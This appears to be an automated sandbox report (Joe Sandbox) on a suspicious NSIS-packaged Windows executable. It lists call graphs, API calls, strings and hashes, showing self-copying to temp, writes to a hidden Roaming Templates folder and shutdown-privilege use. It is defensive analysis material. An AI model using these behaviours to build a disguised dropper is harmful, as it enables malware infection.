GlobalFree 4568->4572 4572->4539 4574 10001881 4574->4568 4665 1000153d wsprintfW 4574->4665 4575 1000187a FreeLibrary 4575->4574 4668 1000121b GlobalAlloc 4577->4668 4579 10001b3c 4669 1000121b GlobalAlloc 4579->4669 4581 10001d7a GlobalFree GlobalFree GlobalFree 4582 10001d97 4581->4582 4593 10001de1 4581->4593 4584 100020ee 4582->4584 4592 10001dac 4582->4592 4582->4593 4583 10001b47 4583->4581 4585 10001c1d GlobalAlloc 4583->4585 4587 10001c86 GlobalFree 4583->4587 4590 10001c68 lstrcpyW 4583->4590 4583->4593 4594 10001c72 lstrcpyW 4583->4594 4598 10002048 4583->4598 4602 10001f37 GlobalFree 4583->4602 4605 1000122c 2 API calls 4583->4605 4607 10001cc4 4583->4607 4675 1000121b GlobalAlloc 4583->4675 4586 10002110 GetModuleHandleW 4584->4586 4584->4593 4585->4583 4588 10002121 LoadLibraryW 4586->4588 4589 10002136 4586->4589 4587->4583 4588->4589 4588->4593 4676 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4589->4676 4590->4594 4592->4593 4672 1000122c 4592->4672 4593->4538 4594->4583 4595 10002188 4595->4593 4596 10002195 lstrlenW 4595->4596 4677 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4596->4677 4598->4593 4601 10002090 lstrcpyW 4598->4601 4601->4593 4602->4583 4603 10002148 4603->4595 4608 10002172 GetProcAddress 4603->4608 4604 100021af 4604->4593 4605->4583 4607->4583 4670 1000158f GlobalSize GlobalAlloc 4607->4670 4608->4595 4611 100022e8 4609->4611 4610 1000122c GlobalAlloc lstrcpynW 4610->4611 4611->4610 4613 10002415 GlobalFree 4611->4613 4615 100023d3 lstrlenW 4611->4615 4616 100023ba GlobalAlloc CLSIDFromString 4611->4616 4617 1000238f GlobalAlloc WideCharToMultiByte 4611->4617 4679 100012ba 4611->4679 4613->4611 4614 100017ae 4613->4614 4614->4546 4614->4550 4614->4554 4615->4613 4619 100023de 4615->4619 4616->4613 4617->4613 4619->4613 4683 100025d9 4619->4683 4622 100028b6 4620->4622 4621 1000295b EnumWindows 4623 10002979 4621->4623 4622->4621 4624 10002a75 
4623->4624 4625 10002a6a GetLastError 4623->4625 4624->4546 4625->4624 4627 10002296 4626->4627 4629 100017a7 4626->4629 4628 100022a8 GlobalAlloc 4627->4628 4627->4629 4628->4627 4629->4541 4634 10002661 4630->4634 4631 100026b2 GlobalAlloc 4635 100026d4 4631->4635 4632 100026c5 4633 100026ca GlobalSize 4632->4633 4632->4635 4633->4635 4634->4631 4634->4632 4635->4566 4637 10002b6a 4636->4637 4638 10002baa GlobalFree 4637->4638 4686 1000121b GlobalAlloc 4639->4686 4641 10002530 StringFromGUID2 4644 100024b3 4641->4644 4642 10002541 lstrcpynW 4642->4644 4643 1000250b MultiByteToWideChar 4643->4644 4644->4641 4644->4642 4644->4643 4645 10002554 wsprintfW 4644->4645 4646 10002571 GlobalFree 4644->4646 4647 100025ac GlobalFree 4644->4647 4648 10001272 2 API calls 4644->4648 4687 100012e1 4644->4687 4645->4644 4646->4644 4647->4555 4648->4644 4691 1000121b GlobalAlloc 4650->4691 4652 100015ba 4653 100015c7 lstrcpyW 4652->4653 4655 100015e1 4652->4655 4656 100015fb 4653->4656 4655->4656 4657 100015e6 wsprintfW 4655->4657 4658 10001272 4656->4658 4657->4656 4659 100012b5 GlobalFree 4658->4659 4660 1000127b GlobalAlloc lstrcpynW 4658->4660 4659->4564 4660->4659 4662 10001861 4661->4662 4663 1000247a 4661->4663 4662->4574 4662->4575 4663->4662 4664 10002496 GlobalFree 4663->4664 4664->4663 4666 10001272 2 API calls 4665->4666 4667 1000155e 4666->4667 4667->4568 4668->4579 4669->4583 4671 100015ad 4670->4671 4671->4607 4678 1000121b GlobalAlloc 4672->4678 4674 1000123b lstrcpynW 4674->4593 4675->4583 4676->4603 4677->4604 4678->4674 4680 100012c1 4679->4680 4681 1000122c 2 API calls 4680->4681 4682 100012df 4681->4682 4682->4611 4684 100025e7 VirtualAlloc 4683->4684 4685 1000263d 4683->4685 4684->4685 4685->4619 4686->4644 4688 100012ea 4687->4688 4689 1000130c 4687->4689 4688->4689 4690 100012f0 lstrcpyW 4688->4690 4689->4644 4690->4689 4691->4652 5408 10001058 5410 10001074 5408->5410 5409 100010dd 5410->5409 5411 10001092 5410->5411 5412 10001516 GlobalFree 5410->5412 

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403379
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",00000000), ref: 004033DB
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",00000020), ref: 00403403
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                          • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",00000000,?), ref: 00403698
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",00000000,?), ref: 004036A4
                                                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,0041FEA8,00000001), ref: 00403725
                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                          • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\Desktop$C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                          • API String ID: 4107622049-468414520
                                                          • Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                          • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                          • Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                          • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                          • GetClientRect.USER32(?,?), ref: 004053DC
                                                          • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405480
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                            • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                          • ShowWindow.USER32(00000000), ref: 0040552C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405531
                                                          • ShowWindow.USER32(00000008), ref: 0040557B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                          • CreatePopupMenu.USER32 ref: 004055C0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                          • GetWindowRect.USER32(?,?), ref: 004055F4
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                          • OpenClipboard.USER32(00000000), ref: 00405655
                                                          • EmptyClipboard.USER32 ref: 0040565B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                          • CloseClipboard.USER32 ref: 004056B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {$&B

                                                          [Figure: control-flow graph; legend: Executed / Not Executed]
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                          • CoTaskMemFree.OLE32(?), ref: 00406113
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                                          [Figure: control-flow graph; legend: Executed / Not Executed]
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 004057F9
                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 00405841
                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 00405864
                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 0040586A
                                                          • FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 0040587A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                          • FindClose.KERNEL32(00000000), ref: 00405929
                                                          Strings
                                                          • \*.*, xrefs: 0040583B
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057DE
                                                          • "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe", xrefs: 004057D9
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00406296
                                                          • FindClose.KERNEL32(00000000), ref: 004062A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8WB
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                          • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          APIs
                                                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 004020FB
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy

                                                          [Figure: control-flow graph; legend: Executed / Not Executed]
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: &B
                                                          • API String ID: 3282139019-3208460036
                                                          • Opcode ID: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                          • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                          • Opcode Fuzzy Hash: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                          • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                          Control-flow Graph

                                                          [Control-flow graph for the function starting at 0040391F; legend: Executed / Not Executed; node and edge listing omitted]
                                                          APIs
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 004039A0
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                          • API String ID: 914957316-1723499676
                                                          • Opcode ID: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                          • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                          • Opcode Fuzzy Hash: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                          • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

                                                          Control-flow Graph

                                                          [Control-flow graph for the function starting at 00402DBC; legend: Executed / Not Executed; node and edge listing omitted]
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,00000400), ref: 00402DEC
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00402E35
                                                          • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-2882808343
                                                          • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                          • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD

                                                          Control-flow Graph

                                                          [Control-flow graph for the function starting at 00401752; legend: Executed / Not Executed; node and edge listing omitted]
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,?,00000031), ref: 00401793
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,?,00000031), ref: 004017B8
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp$C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call
                                                          • API String ID: 1941528284-1720819339
